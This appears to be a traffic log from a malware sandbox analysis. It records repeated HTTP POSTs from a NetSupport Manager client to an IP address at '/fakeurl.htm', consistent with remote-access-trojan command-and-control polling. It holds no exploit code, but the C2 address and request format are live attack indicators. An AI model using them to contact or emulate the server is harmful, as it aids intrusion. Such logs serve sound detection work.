Dec 10, 2024 09:00:03.436089039 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.537107944 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.637070894 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.737112045 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.840780020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:03.940788031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.039094925 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.139071941 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.240061998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.340101957 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.441308975 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.542061090 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.643102884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.743212938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.844104052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:04.944102049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.044790030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.144104004 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.245049953 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.345082045 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.445514917 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.546057940 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.651967049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.756412029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.880790949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:05.983237028 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.184077978 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.285110950 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.385066032 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.486363888 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.586078882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.687063932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.788119078 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.888056993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:06.989116907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.092819929 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.192785025 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.289048910 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.392770052 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.492784023 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.592777967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.691668034 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.792066097 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.892139912 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:07.992093086 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:08.093194008 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:08.193157911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:08.394102097 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:08.613749027 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:08.928091049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.028795004 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.129077911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.229187965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.330091000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.432799101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.532058001 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.636804104 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.734057903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.835083008 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:09.936789036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.037122011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.138130903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.239098072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.340100050 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.441133022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.542093992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.642075062 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.742048979 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.843116045 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:10.943274975 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.044800043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.171730995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.273210049 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.484966040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.688788891 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.788780928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.888791084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:11.989079952 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.090092897 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.191047907 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.292051077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.393066883 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.493498087 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.594082117 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.694087029 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.794055939 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.895071030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:12.995069027 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.096868992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.195199013 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.296044111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.397058010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:13.497664928 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
